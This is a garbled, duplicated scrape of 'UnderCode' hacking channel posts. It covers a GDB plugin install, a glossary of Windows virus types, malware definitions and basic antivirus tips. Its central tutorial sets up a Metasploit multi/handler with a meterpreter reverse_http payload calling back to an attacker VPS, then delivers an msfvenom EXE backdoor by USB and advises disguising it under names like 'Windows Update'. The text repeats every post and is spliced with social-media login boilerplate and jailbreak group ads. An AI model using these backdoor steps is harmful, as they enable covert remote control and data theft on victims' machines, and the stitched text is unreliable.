(Instagram.com/UndercodeTestingCompany)
๐ฆINSTALLISATION:
1) Simply make sure you have GDB 7.7 or higher compiled with Python2 or Python3 bindings, then:
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆEXPLOITE ANY LINUXโ ๏ธBy UnderCode
(Instagram.com/UndercodeTestingCompany)
๐ฆINSTALLISATION:
1) Simply make sure you have GDB 7.7 or higher compiled with Python2 or Python3 bindings, then:
via the install script
2) wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh
๐ฆmanually
1) wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py
2) echo source ~/.gdbinit-gef.py >> ~/.gdbinit
3) Then just start playing:$ gdb -q /path/to/my/
bin
4)gefโค gef help
@ Mr. BotNet(tm)- - - - UาNาDาEาRาCาOาDาEา- - - -
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆTOP POPULAR VIRUS FOR WINDOWS + RESULTS:
1) Nonresident Virus
Nonresident viruses replicate through modules. When the module is executed, it will select one or more files to infect.
2) Stealth Virus
Stealth viruses trick antivirus software by appearing like they are real files or programs and by intercepting its requests to the OS. Some antivirus software cannot detect them. Sometimes, it temporarily removes itself from the system without deletion.
3) Sparse Infector
Sparse infectors use different techniques to minimize its detection. They are viruses that infect โoccasionallyโ. For example, they may only want to infect a program every tenth execution. Because they are occasional infectors, antivirus software has a hard time detecting them.
4) Spacefiller Virus
Also known as โcavityโ viruses, spacefillers attach themselves to the file and can alter the start of the program or change the encrypted code. They also implement stealth techniques so that users cannot determine the increase the file code. The most popular Spacefiller is the Lehigh virus.
5) FAT Virus
Basically, this type of virus ruins file allocation system where the information about files, including the location, exist.
6) Macro Virus
Macro viruses target applications and software that contain macros. These viruses can carry out series of operations affecting the performance of the program or software. Some examples of macro viruses are O97M/Y2K, Bablas, Melissa.A, and Relax.
7) Directory Virus
Directory viruses change file paths. When you run programs and software that are infected with directory viruses, the virus program also runs in the background. Further, it may be difficult for you to locate the original app or software once infected with directory viruses.
8) Polymorphic Virus
Polymorphic viruses use a special method of encoding or encryption every time they infect a system. With this, antivirus software finds it hard to locate then using signature searches. They are also capable of replicating easily. Polymorphic viruses include Satan Bug, Elkern, Tuareg, and Marburg.
9) File Infector Virus
This virus also infects executable files or programs. When you run these programs, the file infector virus is activated as well which can slow down the program and produce other damaging effects. A large block of existing viruses belongs to this category.
10) Encrypted Virus
This type of virus uses encrypted malicious codes which make antivirus software hard to detect them. They can only be detected when they decrypt themselves during replication. Although they donโt delete files or folders, they can badly affect PC performance.
11) Companion Virus
This is a type of virus that doesnโt survive without accompanying an existing file or folder. In order to carry out damages, the file or folder being accompanied by companion viruses should be opened or run. Some examples of companion viruses include Terrax.1069, Stator, and Asimov.1539.
12) Network Virus
Basically, this type of virus spreads out through Local Network Area (LAN) and through the internet. These viruses replicate through shared resources, including drives and folders. When network viruses enter a computer, they look for their potential prey. Dangerous network viruses include Nimda and SQLSlammer.
13) Resident Virus
Resident viruses live in your RAM memory. It can interfere with normal system operation which can lead to the corruption of files and programs. The most popular examples of resident viruses are CMJ, Meve, MrKlunky, and Randex.
14) Multipartite Virus
This type of virus can easily spread in your computer system. It is very infectious, performing unauthorized actions in your operating system, in folders, and other programs on the computer. They have the ability to infect both the executable files and the boots sector.
๐ฆTOP POPULAR VIRUS FOR WINDOWS + RESULTS:
1) Nonresident Virus
Nonresident viruses replicate through modules. When the module is executed, it will select one or more files to infect.
2) Stealth Virus
Stealth viruses trick antivirus software by appearing like they are real files or programs and by intercepting its requests to the OS. Some antivirus software cannot detect them. Sometimes, it temporarily removes itself from the system without deletion.
3) Sparse Infector
Sparse infectors use different techniques to minimize its detection. They are viruses that infect โoccasionallyโ. For example, they may only want to infect a program every tenth execution. Because they are occasional infectors, antivirus software has a hard time detecting them.
4) Spacefiller Virus
Also known as โcavityโ viruses, spacefillers attach themselves to the file and can alter the start of the program or change the encrypted code. They also implement stealth techniques so that users cannot determine the increase the file code. The most popular Spacefiller is the Lehigh virus.
5) FAT Virus
Basically, this type of virus ruins file allocation system where the information about files, including the location, exist.
6) Macro Virus
Macro viruses target applications and software that contain macros. These viruses can carry out series of operations affecting the performance of the program or software. Some examples of macro viruses are O97M/Y2K, Bablas, Melissa.A, and Relax.
7) Directory Virus
Directory viruses change file paths. When you run programs and software that are infected with directory viruses, the virus program also runs in the background. Further, it may be difficult for you to locate the original app or software once infected with directory viruses.
8) Polymorphic Virus
Polymorphic viruses use a special method of encoding or encryption every time they infect a system. With this, antivirus software finds it hard to locate then using signature searches. They are also capable of replicating easily. Polymorphic viruses include Satan Bug, Elkern, Tuareg, and Marburg.
9) File Infector Virus
This virus also infects executable files or programs. When you run these programs, the file infector virus is activated as well which can slow down the program and produce other damaging effects. A large block of existing viruses belongs to this category.
10) Encrypted Virus
This type of virus uses encrypted malicious codes which make antivirus software hard to detect them. They can only be detected when they decrypt themselves during replication. Although they donโt delete files or folders, they can badly affect PC performance.
11) Companion Virus
This is a type of virus that doesnโt survive without accompanying an existing file or folder. In order to carry out damages, the file or folder being accompanied by companion viruses should be opened or run. Some examples of companion viruses include Terrax.1069, Stator, and Asimov.1539.
12) Network Virus
Basically, this type of virus spreads out through Local Network Area (LAN) and through the internet. These viruses replicate through shared resources, including drives and folders. When network viruses enter a computer, they look for their potential prey. Dangerous network viruses include Nimda and SQLSlammer.
13) Resident Virus
Resident viruses live in your RAM memory. It can interfere with normal system operation which can lead to the corruption of files and programs. The most popular examples of resident viruses are CMJ, Meve, MrKlunky, and Randex.
14) Multipartite Virus
This type of virus can easily spread in your computer system. It is very infectious, performing unauthorized actions in your operating system, in folders, and other programs on the computer. They have the ability to infect both the executable files and the boots sector.
15) Direct Action Virus
Direct action viruses attack certain types of files, typically .exe and .com files. The main purpose of this virus is to replicate and infect files in folders. On the lighter note, they do not typically delete files or affect PC performance and speed. It can be easily removed by antivirus programs.
16) Browser Hijacker
This type of virus infects your web browser in which it will bring you to different websites. Typically, if you key in a domain name in the internet address bar, the browser hijacker will open multiple fake websites that may harm your computer. On the other hand, most trusted browsers have built-in features to block them ahead.
17) Overwrite Virus
From the name itself, this virus overwrites the content of a file, losing the original content. It infects folders, files, and even programs. To delete this virus, you also need to get rid of your file. Thus, it is important to back up your data.
18) Web Scripting Virus
This virus lives in certain links, ads, image placement, videos, and layout of a website. These may carry malicious codes in which when you click, the viruses will be automatically downloaded or will direct you to malicious websites.
19) Boot Sector Virus
Boot sector viruses affect floppy disks. They came to existence when floppy disks are important in booting a computer. Although they are not very common today, it is still causing other computer units, especially the outdated ones. Some examples include Polyboot.B and AntiEXE.
instagram.com/UnderCodeTestingCompany
@ Mr. BotNet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
Direct action viruses attack certain types of files, typically .exe and .com files. The main purpose of this virus is to replicate and infect files in folders. On the lighter note, they do not typically delete files or affect PC performance and speed. It can be easily removed by antivirus programs.
16) Browser Hijacker
This type of virus infects your web browser in which it will bring you to different websites. Typically, if you key in a domain name in the internet address bar, the browser hijacker will open multiple fake websites that may harm your computer. On the other hand, most trusted browsers have built-in features to block them ahead.
17) Overwrite Virus
From the name itself, this virus overwrites the content of a file, losing the original content. It infects folders, files, and even programs. To delete this virus, you also need to get rid of your file. Thus, it is important to back up your data.
18) Web Scripting Virus
This virus lives in certain links, ads, image placement, videos, and layout of a website. These may carry malicious codes in which when you click, the viruses will be automatically downloaded or will direct you to malicious websites.
19) Boot Sector Virus
Boot sector viruses affect floppy disks. They came to existence when floppy disks are important in booting a computer. Although they are not very common today, it is still causing other computer units, especially the outdated ones. Some examples include Polyboot.B and AntiEXE.
instagram.com/UnderCodeTestingCompany
@ Mr. BotNet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆWhat are the different types of Viruses, Spyware and Malware that can infect my computer?
(t.me/UnderCodetestingOfficial)
1) Virus
A computer virus is a piece of software that can 'infect' a computer, install itself and copy itself to other computers, without the users knowledge or permission. It usually attaches itself to other computer programs, data files, or the boot sector of a Hard drive.
2) Malware
Malware is short for malicious software. Malware is the name given to any type of software that could harm a computer system, interfere with and gather a user's data, or make the computer perform actions without the owner's knowledge or permission.
3) Trojan horse
A type of malware that uses malicious code to install software that seems ok, but is hidden to create back doors into a system typically causing loss or theft of data from an external source.
4) Worm
Unlike a virus, a worm, is a standalone piece of malicious software that replicates itself in order to spread to other computers. It often uses a computer network to spread itself, relying on security flaws on the target system to allow access.
5) Spyware
Spyware is software that aids in gathering information about a person or organization without their knowledge, they can monitor and log the activity performed on a target system, like log key strokes, or gather credit card and other information.
6) Adware
Adware is software which can automatically causes pop-up and banner adverts to be displayed in order to generate revenue for its author or publisher. A lot of freeware will use Adware but not always in a malicious way, if it was malicious, it would then be classed as spyware or malware.
@ Mr. BotNet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆWhat are the different types of Viruses, Spyware and Malware that can infect my computer?
(t.me/UnderCodetestingOfficial)
1) Virus
A computer virus is a piece of software that can 'infect' a computer, install itself and copy itself to other computers, without the users knowledge or permission. It usually attaches itself to other computer programs, data files, or the boot sector of a Hard drive.
2) Malware
Malware is short for malicious software. Malware is the name given to any type of software that could harm a computer system, interfere with and gather a user's data, or make the computer perform actions without the owner's knowledge or permission.
3) Trojan horse
A type of malware that uses malicious code to install software that seems ok, but is hidden to create back doors into a system typically causing loss or theft of data from an external source.
4) Worm
Unlike a virus, a worm, is a standalone piece of malicious software that replicates itself in order to spread to other computers. It often uses a computer network to spread itself, relying on security flaws on the target system to allow access.
5) Spyware
Spyware is software that aids in gathering information about a person or organization without their knowledge, they can monitor and log the activity performed on a target system, like log key strokes, or gather credit card and other information.
6) Adware
Adware is software which can automatically causes pop-up and banner adverts to be displayed in order to generate revenue for its author or publisher. A lot of freeware will use Adware but not always in a malicious way, if it was malicious, it would then be classed as spyware or malware.
@ Mr. BotNet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆHow Can a Computer Be Protected from Viruses?
(t.me/UnderCodeTestingOfficial)
1) Install an anti-virus program and keep it up-to-date and regularly run scans.
2) Install an anti-malware program to stop software installing without your knowledge.
3) Never download and install software from the Internet unless you are certain it is from a trusted source.
4) Donโt open e-mail attachments unless you have scanned them first, even a picture can carry a virus.
5) Donโt trust cracked or hacked software as they often contain malware, Trojans.
@ UnderCodeTestingc
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆHow Can a Computer Be Protected from Viruses?
(t.me/UnderCodeTestingOfficial)
1) Install an anti-virus program and keep it up-to-date and regularly run scans.
2) Install an anti-malware program to stop software installing without your knowledge.
3) Never download and install software from the Internet unless you are certain it is from a trusted source.
4) Donโt open e-mail attachments unless you have scanned them first, even a picture can carry a virus.
5) Donโt trust cracked or hacked software as they often contain malware, Trojans.
@ UnderCodeTestingc
- - - - UาNาDาEาRาCาOาDาEา- - - -
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆhOW eXPLOITE wINDOWS Files & password by undercOde:
(facebook.com/UnderCodeTESTingCompanie)
๐ฆLETS START:
1) Create the Live USB
> create live USBs include Rufus and LinuxLive USB Creator. However, I recommend Etcher, a cross-platform and open-source utility designed to make creating bootable USBs as simple as possible.
> A lightweight Linux ISO is recommended, as it'll allow Etcher to create the live USB very quickly. Any Linux ISO that allows users to try the operating system without installing it will work just fine.
2) Set Up Your VPS
> A virtual private server (VPS) is required to host the Metasploit listener. This is the server the compromised device will connect back to.
3) Now Lets install Metasploite On Vps:
> curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall.
> sudo chmod 755 msfinstall
> run the newly created "msfinstall" file as root to install Metasploit.
> sudo ./msfinstall
4) Install Screen on the VPS:
"Screen" is a program which allows users to manage multiple terminal sessions within the same console. It has the ability to "detach," or close, the terminal window without losing any data running in the terminal.
> TYPE
> sudo apt-get install screen
>screen (to start)
5) Rub screan session :
> screen -r SESSION-NAME
6) use the nano command to create a file on the VPS using the below command.
> nano ~/automate.rc
use multi/handler
set payload windows/meterpreter/reverse_http
set LHOST Your.VPS.IP.Here
set LPORT 80
set ExitOnSession false
set EnableStageEncoding true
exploit -j
๐ฆNow its Time for attack boot the life usb
After generating the Msfvenom payload, it will need to be saved to the second USB flash drive.
> Simply insert the second USB into the computer with the EXE payload, then drag-and-drop the payload over to it. That's literally all there is to creating the payload USB.
@ Mr BotNet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆhOW eXPLOITE wINDOWS Files & password by undercOde:
(facebook.com/UnderCodeTESTingCompanie)
๐ฆLETS START:
1) Create the Live USB
> create live USBs include Rufus and LinuxLive USB Creator. However, I recommend Etcher, a cross-platform and open-source utility designed to make creating bootable USBs as simple as possible.
> A lightweight Linux ISO is recommended, as it'll allow Etcher to create the live USB very quickly. Any Linux ISO that allows users to try the operating system without installing it will work just fine.
2) Set Up Your VPS
> A virtual private server (VPS) is required to host the Metasploit listener. This is the server the compromised device will connect back to.
3) Now Lets install Metasploite On Vps:
> curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall.
> sudo chmod 755 msfinstall
> run the newly created "msfinstall" file as root to install Metasploit.
> sudo ./msfinstall
4) Install Screen on the VPS:
"Screen" is a program which allows users to manage multiple terminal sessions within the same console. It has the ability to "detach," or close, the terminal window without losing any data running in the terminal.
> TYPE
> sudo apt-get install screen
>screen (to start)
5) Rub screan session :
> screen -r SESSION-NAME
6) use the nano command to create a file on the VPS using the below command.
> nano ~/automate.rc
use multi/handler
set payload windows/meterpreter/reverse_http
set LHOST Your.VPS.IP.Here
set LPORT 80
set ExitOnSession false
set EnableStageEncoding true
exploit -j
๐ฆNow its Time for attack boot the life usb
After generating the Msfvenom payload, it will need to be saved to the second USB flash drive.
> Simply insert the second USB into the computer with the EXE payload, then drag-and-drop the payload over to it. That's literally all there is to creating the payload USB.
@ Mr BotNet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
Facebook
Log in to Facebook | Facebook
Log in to Facebook to start sharing and connecting with your friends, family and people you know.
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆSOME COMMUN WORDS IN WINDOWS BACKDOORS :
(facebook.com/UnderCodeTestingCompanie)
1) payload: The payload type being used is "windows/meterpreter/reverse_http." This payload should correspond to the payload type used in the automate.rc resource file created in the previous step.
2) LHOST=YourVpsIpHere: The LHOST is the IP address of the attacker's server running Metasploit. This IP address should correspond to the LHOST used in the automate.rc resource file created in the previous step.
3) LPORT=80: The LPORT specifies the destination port. This port number should correspond to the LPORT used in the automate.rc resource file created in the previous step.
4) arch x86: Older Windows computers (32-bit) use x86 architecture and cannot execute 64-bit executables. Newer, 64-bit Windows computers can use either x86 or x64 architectures. It makes sense for attackers to use x86 architectures to cover a wider spectrum of Windows users.
5) platform win: This specifies the target platform. Other platforms include Android, macOS, Unix, and Solaris. In the case of this example, the "win" (Windows) platform was used.
6) format exe: Here the output format was specified as EXE or "executable." This executable will run on Windows computers without user input.
7) out: Attackers will often name viruses and backdoors after something believable like "Windows Security," "Windows Update," or "explorer.exe" to convince users a running process is not harmful or suspicious. The --out defines the name of the executable payload.
@ Mr BotNet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆSOME COMMUN WORDS IN WINDOWS BACKDOORS :
(facebook.com/UnderCodeTestingCompanie)
1) payload: The payload type being used is "windows/meterpreter/reverse_http." This payload should correspond to the payload type used in the automate.rc resource file created in the previous step.
2) LHOST=YourVpsIpHere: The LHOST is the IP address of the attacker's server running Metasploit. This IP address should correspond to the LHOST used in the automate.rc resource file created in the previous step.
3) LPORT=80: The LPORT specifies the destination port. This port number should correspond to the LPORT used in the automate.rc resource file created in the previous step.
4) arch x86: Older Windows computers (32-bit) use x86 architecture and cannot execute 64-bit executables. Newer, 64-bit Windows computers can use either x86 or x64 architectures. It makes sense for attackers to use x86 architectures to cover a wider spectrum of Windows users.
5) platform win: This specifies the target platform. Other platforms include Android, macOS, Unix, and Solaris. In the case of this example, the "win" (Windows) platform was used.
6) format exe: Here the output format was specified as EXE or "executable." This executable will run on Windows computers without user input.
7) out: Attackers will often name viruses and backdoors after something believable like "Windows Security," "Windows Update," or "explorer.exe" to convince users a running process is not harmful or suspicious. The --out defines the name of the executable payload.
@ Mr BotNet(tm)
- - - - UาNาDาEาRาCาOาDาEา- - - -
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
โ - UndercOde- โ
GUYZ TILL OUR CYDIA REPO IS BACK IN JAILBROKEN IOS
WE START IN IOS JAILBREAK HELP & SUPPORT
> FROM BEGINERS TILL EXPRETS
๐ฆ JOIN IF YOU ONLY IOS USERS ๐ฆ
T.me/UnderCodeRepoUpdates
> REQUIRE ONLY IOS TO JOIN this Wa Grp:
https://chat.whatsapp.com/F2OCn7jbgjAACKouOnILHm
GUYZ TILL OUR CYDIA REPO IS BACK IN JAILBROKEN IOS
WE START IN IOS JAILBREAK HELP & SUPPORT
> FROM BEGINERS TILL EXPRETS
๐ฆ JOIN IF YOU ONLY IOS USERS ๐ฆ
T.me/UnderCodeRepoUpdates
> REQUIRE ONLY IOS TO JOIN this Wa Grp:
https://chat.whatsapp.com/F2OCn7jbgjAACKouOnILHm